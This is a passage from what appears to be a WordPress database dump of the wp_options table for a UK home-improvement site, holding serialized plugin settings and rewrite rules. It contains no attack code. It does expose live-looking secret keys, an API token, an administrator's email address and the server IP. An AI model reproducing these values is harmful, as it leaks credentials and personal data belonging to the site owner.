ge\";s:77:\"http://housing-today.co.uk/wp-content/uploads/2016/11/cropped-lost-places.jpg\";s:17:\"header_image_data\";O:8:\"stdClass\":5:{s:13:\"attachment_id\";i:33;s:3:\"url\";s:77:\"http://housing-today.co.uk/wp-content/uploads/2016/11/cropped-lost-places.jpg\";s:13:\"thumbnail_url\";s:77:\"http://housing-today.co.uk/wp-content/uploads/2016/11/cropped-lost-places.jpg\";s:6:\"height\";i:300;s:5:\"width\";i:960;}s:17:\"vega_wp_logo_text\";s:23:\"Home Improvements Today\";s:18:\"custom_css_post_id\";i:-1;}','yes'),(264,'redux_version_upgraded_from','3.6.2','yes'),(453,'wpseo_sitemap_wpcf7_contact_form_cache_validator','4gQ9e','no'),(457,'universal_google_analytics_tracking_id','UA-88267286-1','yes'),(2547,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:7:\"version\";s:5:\"6.1.1\";s:9:\"timestamp\";i:1668565138;}','no'),(4003,'wpseo_sitemap_author_cache_validator','596T4','no'),(5446,'db_upgraded','','yes'),(28535,'fresh_site','0','yes'),(28536,'wpseo_sitemap_35_cache_validator','4rju4','no'),(43935,'wpseo_sitemap_94_cache_validator','4r1XO','no'),(46115,'updraft_task_manager_dbversion','1.1','yes'),(46117,'wp-optimize-corrupted-tables-count','0','yes'),(46118,'wp-optimize-compression_server','nitrosmush','yes'),(46119,'wp-optimize-image_quality','95','yes'),(46120,'wp-optimize-back_up_original','','yes'),(46121,'wp-optimize-enable-auto-backup','false','yes'),(46122,'wp-optimize-lossy_compression','1','yes'),(46123,'wp-optimize-preserve_exif','','yes'),(46124,'wp-optimize-autosmush','1','yes'),(46125,'wp-optimize-show_smush_metabox','show','yes'),(46126,'Re_Smush_It_Task','1565614014','yes'),(46135,'wp-optimize-completed_task_count','55','yes'),(46136,'wp-optimize-total_bytes_saved','580830','yes'),(46137,'wp-optimize-total_percent_saved','5.0667272727273','yes'),(46415,'wpseo_sitemap_158_cache_validator','3SRH4','no'),(47566,'wpo_cache_config','a:16:{s:19:\"enable_page_caching\";b:0;s:23:\"page_cache_length_value\";i:24;s:22:\"page_cache_length_unit\";s:5:\"hours\";s:17:\"page_cache_length\";i:86400;s:20:\"cache_exception_urls\";a:0:{}s:23:\"cache_exception_cookies\";a:0:{}s:30:\"cache_exception_browser_agents\";a:0:{}s:22:\"enable_sitemap_preload\";b:0;s:23:\"enable_schedule_preload\";b:0;s:21:\"preload_schedule_type\";s:0:\"\";s:21:\"enable_mobile_caching\";b:0;s:19:\"enable_user_caching\";b:0;s:8:\"site_url\";s:28:\"https://housing-today.co.uk/\";s:24:\"enable_cache_per_country\";b:0;s:17:\"wpo_cache_cookies\";a:0:{}s:25:\"wpo_cache_query_variables\";a:0:{}}','yes'),(47567,'redirection_options','a:31:{s:7:\"support\";b:0;s:5:\"token\";s:32:\"cbb4107a29960824ac94ec37a548a751\";s:12:\"monitor_post\";i:0;s:13:\"monitor_types\";a:0:{}s:19:\"associated_redirect\";s:0:\"\";s:11:\"auto_target\";s:0:\"\";s:15:\"expire_redirect\";i:7;s:10:\"expire_404\";i:7;s:7:\"modules\";a:0:{}s:10:\"newsletter\";b:0;s:14:\"redirect_cache\";i:1;s:10:\"ip_logging\";i:1;s:13:\"last_group_id\";i:0;s:8:\"rest_api\";i:0;s:5:\"https\";b:0;s:8:\"database\";s:0:\"\";s:10:\"flag_query\";s:5:\"exact\";s:9:\"flag_case\";b:0;s:13:\"flag_trailing\";b:0;s:10:\"flag_regex\";b:0;s:12:\"log_external\";b:0;s:10:\"log_header\";b:0;s:10:\"track_hits\";b:1;s:7:\"headers\";a:0:{}s:8:\"relocate\";s:0:\"\";s:16:\"preferred_domain\";s:0:\"\";s:7:\"aliases\";a:0:{}s:10:\"permalinks\";a:0:{}s:9:\"cache_key\";i:0;s:13:\"plugin_update\";s:6:\"prompt\";s:13:\"update_notice\";i:0;}','yes'),(47569,'wp-optimize-is_gzip_compression_enabled','1','yes'),(47597,'wpseo_sitemap_180_cache_validator','3IMgN','no'),(47598,'wpseo_sitemap_post_tag_cache_validator','381iR','no'),(48128,'category_children','a:0:{}','yes'),(48129,'wpseo_sitemap_209_cache_validator','4Rcp3','no'),(60829,'wpseo_sitemap_239_cache_validator','4G87u','no'),(60835,'fs_active_plugins','O:8:\"stdClass\":3:{s:7:\"plugins\";a:1:{s:33:\"wp-meta-and-date-remover/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:7:\"2.4.0.1\";s:4:\"type\";s:6:\"plugin\";s:9:\"timestamp\";i:1606751047;s:11:\"plugin_path\";s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";}}s:7:\"abspath\";s:38:\"/home/housing-today.co.uk/public_html/\";s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";s:8:\"sdk_path\";s:33:\"wp-meta-and-date-remover/freemius\";s:7:\"version\";s:7:\"2.4.0.1\";s:13:\"in_activation\";b:0;s:9:\"timestamp\";i:1606751047;}}','yes'),(60836,'fs_debug_mode','','yes'),(60837,'fs_accounts','a:5:{s:21:\"id_slug_type_path_map\";a:1:{i:6753;a:3:{s:4:\"slug\";s:24:\"wp-meta-and-date-remover\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";}}s:11:\"plugin_data\";a:1:{s:24:\"wp-meta-and-date-remover\";a:14:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1597932485;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:7:\"2.4.0.1\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:5:\"1.8.2\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:0;s:4:\"host\";s:19:\"housing-today.co.uk\";s:9:\"server_ip\";s:14:\"185.175.113.72\";s:9:\"is_active\";b:0;s:9:\"timestamp\";i:1597932488;s:7:\"version\";s:5:\"1.8.2\";}}}s:13:\"file_slug_map\";a:1:{s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";s:24:\"wp-meta-and-date-remover\";}s:7:\"plugins\";a:1:{s:24:\"wp-meta-and-date-remover\";O:9:\"FS_Plugin\":23:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:24:\"WP Meta and Date Remover\";s:4:\"slug\";s:24:\"wp-meta-and-date-remover\";s:12:\"premium_slug\";s:32:\"wp-meta-and-date-remover-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";s:7:\"version\";s:5:\"1.8.2\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:3:\"Pro\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:10:\"public_key\";s:32:\"pk_6bc68a469d4ab171bcc3dc4717f42\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"6753\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"0a50ea03a1a5e65566d282b144f5fb6f\";}','yes'),(60839,'fs_options','a:1:{s:14:\"api_clock_diff\";i:416;}','yes'),(60840,'wpo_update_version','3.1.2','yes'),(61372,'wp-optimize-install-or-update-notice-version','1.1','yes'),(61505,'wpseo_sitemap_228_cache_validator','oQRY','no'),(62461,'wpo_minify_config','a:46:{s:5:\"debug\";b:0;s:19:\"enabled_css_preload\";b:0;s:18:\"enabled_js_preload\";b:0;s:11:\"hpreconnect\";s:0:\"\";s:8:\"hpreload\";s:0:\"\";s:7:\"loadcss\";b:0;s:10:\"remove_css\";b:0;s:17:\"critical_path_css\";s:0:\"\";s:31:\"critical_path_css_is_front_page\";s:0:\"\";s:30:\"preserve_settings_on_uninstall\";b:1;s:22:\"disable_when_logged_in\";b:0;s:16:\"default_protocol\";s:7:\"dynamic\";s:17:\"html_minification\";b:1;s:16:\"clean_header_one\";b:0;s:13:\"emoji_removal\";b:1;s:18:\"merge_google_fonts\";b:1;s:18:\"remove_googlefonts\";b:0;s:13:\"gfonts_method\";s:6:\"inline\";s:15:\"fawesome_method\";s:6:\"inline\";s:10:\"enable_css\";b:1;s:23:\"enable_css_minification\";b:1;s:21:\"enable_merging_of_css\";b:1;s:23:\"remove_print_mediatypes\";b:0;s:10:\"inline_css\";b:0;s:9:\"enable_js\";b:1;s:22:\"enable_js_minification\";b:1;s:20:\"enable_merging_of_js\";b:1;s:15:\"enable_defer_js\";b:0;s:18:\"enable_js_trycatch\";b:0;s:19:\"exclude_defer_login\";b:0;s:19:\"defer_for_pagespeed\";b:0;s:7:\"cdn_url\";s:0:\"\";s:9:\"cdn_force\";b:0;s:9:\"async_css\";s:0:\"\";s:8:\"async_js\";s:0:\"\";s:24:\"disable_css_inline_merge\";b:1;s:6:\"ualist\";a:8:{i:0;s:12:\"x11.*fox\\/54\";i:1;s:20:\"oid\\s4.*xus.*ome\\/62\";i:2;s:12:\"x11.*ome\\/62\";i:3;s:5:\"oobot\";i:4;s:5:\"ighth\";i:5;s:5:\"tmetr\";i:6;s:6:\"eadles\";i:7;s:5:\"ingdo\";}s:9:\"blacklist\";s:441:\"/html5shiv.js\n/html5shiv-printshiv.min.js\n/excanvas.js\n/avada-ie9.js\n/respond.js\n/respond.min.js\n/selectivizr.js\n/Avada/assets/css/ie.css\n/html5.js\n/IE9.js\n/fusion-ie9.js\n/vc_lte_ie9.min.css\n/old-ie.css\n/ie.css\n/vc-ie8.min.css\n/mailchimp-for-wp/assets/js/third-party/placeholders.min.js\n/assets/js/plugins/wp-enqueue/min/webfontloader.js\n/a.optnmstr.com/app/js/api.min.js\n/pixelyoursite/js/public.js\n/assets/js/wcdrip-drip.js\n/instantpage.js\";s:11:\"ignore_list\";s:561:\"/genericons.css\n/Avada/assets/js/main.min.js\n/woocommerce-product-search/js/product-search.js\n/includes/builder/scripts/frontend-builder-scripts.js\n/assets/js/jquery.themepunch.tools.min.js\n/js/TweenMax.min.js\n/jupiter/assets/js/min/full-scripts\n/wp-content/themes/Divi/core/admin/js/react-dom.production.min.js\n/LayerSlider/static/layerslider/js/greensock.js\n/themes/kalium/assets/js/main.min.js\n/elementor/assets/js/common.min.js\n/elementor/assets/js/frontend.min.js\n/elementor-pro/assets/js/frontend.min.js\n/wp-includes/js/mediaelement/wp-mediaelement.min.js\";s:10:\"exclude_js\";s:0:\"\";s:11:\"exclude_css\";s:0:\"\";s:23:\"edit_default_exclutions\";b:0;s:18:\"merge_allowed_urls\";s:0:\"\";s:7:\"enabled\";b:0;s:17:\"last-cache-update\";i:1615220575;s:14:\"plugin_version\";s:5:\"0.0.0\";}','yes'),(62647,'ai1wm_updater','a:0:{}','yes'),(62649,'active_plugins1','a:10:{i:0;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:1;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:2;s:36:\"contact-form-7/wp-contact-form-7.php\";i:3;s:39:\"disable-gutenberg/disable-gutenberg.php\";i:4;s:27:\"redirection/redirection.php\";i:5;s:29:\"spam-captcha/spam-captcha.php\";i:6;s:57:\"universal-google-analytics/universal-google-analytics.php\";i:7;s:24:\"wordpress-seo/wp-seo.php\";i:8;s:53:\"wp-meta-and-date-remover/wp-meta-and-date-remover.php\";i:9;s:27:\"wp-optimize/wp-optimize.php\";}','yes'),(62650,'ai1wm_secret_key','NhwbVB2ESgHK','yes'),(62651,'ai1wm_backups_labels','a:0:{}','yes'),(62652,'ai1wm_sites_links','a:0:{}','yes'),(62653,'widget_media_audio','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(62654,'widget_media_image','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(62655,'widget_media_gallery','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(62656,'widget_media_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(62657,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(62659,'ai1wm_status','a:3:{s:4:\"type\";s:4:\"done\";s:5:\"title\";s:41:\"Your site has been imported successfully!\";s:7:\"message\";s:380:\"» <a class=\"ai1wm-no-underline\" href=\"https://housing-today.co.uk/wp-admin/options-permalink.php#submit\" target=\"_blank\">Save permalinks structure</a>. (opens a new window)<br />» <a class=\"ai1wm-no-underline\" href=\"https://wordpress.org/support/view/plugin-reviews/all-in-one-wp-migration?rate=5#postform\" target=\"_blank\">Optionally, review the plugin</a>. (opens a new window)\";}','yes'),(62661,'template','vega','yes'),(62662,'stylesheet','vega','yes'),(62663,'swift_performance_plugin_organizer','a:0:{}','yes'),(62664,'jetpack_active_modules','a:0:{}','yes'),(62672,'recovery_keys','a:0:{}','yes'),(62715,'wpseo_sitemap_wp_cache_validator','4BxJB','no'),(62733,'_transient_health-check-site-status-result','{\"good\":15,\"recommended\":5,\"critical\":1}','yes'),(62746,'finished_updating_comment_type','1','yes'),(63748,'wp_page_for_privacy_policy','0','yes'),(63749,'show_comments_cookies_opt_in','1','yes'),(63750,'admin_email_lifespan','1647437436','yes'),(63751,'disallowed_keys','','no'),(63752,'comment_previously_approved','','yes'),(63753,'auto_plugin_theme_update_emails','a:0:{}','no'),(74421,'wordfence_ls_version','1.0.8','yes'),(74422,'wfls_last_role_change','1629463977','no'),(74423,'wordfence_version','7.5.5','yes'),(74424,'wordfence_case','1','yes'),(74425,'wordfence_installed','1','yes'),(74426,'wordfenceActivated','1','yes'),(74427,'active_plugins','a:3:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1;s:39:\"disable-gutenberg/disable-gutenberg.php\";i:2;s:24:\"wordpress-seo/wp-seo.php\";}','yes'),(74428,'wf_plugin_act_error','','yes'),(74715,'wordfence_syncAttackDataAttempts','0','no'),(74716,'wordfence_syncingAttackData','0','no'),(74718,'wordfence_lastSyncAttackData','1631517481','no'),(77056,'https_detection_errors','a:0:{}','yes'),(77084,'yoast_migrations_free','a:1:{s:7:\"version\";s:4:\"17.1\";}','yes'),(77088,'wpseo_ryte','a:2:{s:6:\"status\";i:1;s:10:\"last_fetch\";i:1631527504;}','yes'),(77155,'recovery_mode_email_last_sent','1649928307','yes'),(86260,'_cerber_notify_new','a:2:{i:0;s:3:\"8.9\";i:1;s:5:\"8.9.3\";}','no'),(90523,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(90533,'wp_force_deactivated_plugins','a:0:{}','yes'),(105217,'rewrite_rules','a:93:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:52:\"blog/category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:47:\"blog/category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:28:\"blog/category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:40:\"blog/category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:22:\"blog/category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:49:\"blog/tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:44:\"blog/tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:25:\"blog/tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:37:\"blog/tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:19:\"blog/tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:50:\"blog/type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:45:\"blog/type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:26:\"blog/type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:38:\"blog/type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:20:\"blog/type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:52:\"blog/author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:47:\"blog/author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:28:\"blog/author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:40:\"blog/author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:22:\"blog/author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:74:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:69:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:50:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:62:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:44:\"blog/([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:61:\"blog/([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:56:\"blog/([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:37:\"blog/([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:49:\"blog/([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:31:\"blog/([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:48:\"blog/([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:43:\"blog/([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:24:\"blog/([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:36:\"blog/([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:18:\"blog/([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:32:\"blog/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:42:\"blog/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:62:\"blog/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"blog/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:57:\"blog/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:38:\"blog/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:21:\"blog/([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:25:\"blog/([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:45:\"blog/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:40:\"blog/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:33:\"blog/([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:40:\"blog/([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:29:\"blog/([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:21:\"blog/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:31:\"blog/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:51:\"blog/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"blog/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:46:\"blog/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:27:\"blog/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(105591,'aiowps_temp_configs','a:92:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:1:\"1\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";i:3;s:24:\"aiowps_retry_time_period\";i:5;s:26:\"aiowps_lockout_time_length\";i:60;s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:32:\"aiowps_unlock_request_secret_key\";s:20:\"2lp6dmoqgd7c5ybgmole\";s:26:\"aiowps_enable_whitelisting\";s:1:\"1\";s:27:\"aiowps_allowed_ip_addresses\";s:14:\"185.175.113.72\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"7j4eykuk5o2vzamgf436\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:29:\"zoe.allen@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:1:\"1\";s:37:\"aiowps_prevent_default_wp_file_access\";s:1:\"1\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:0:\"\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_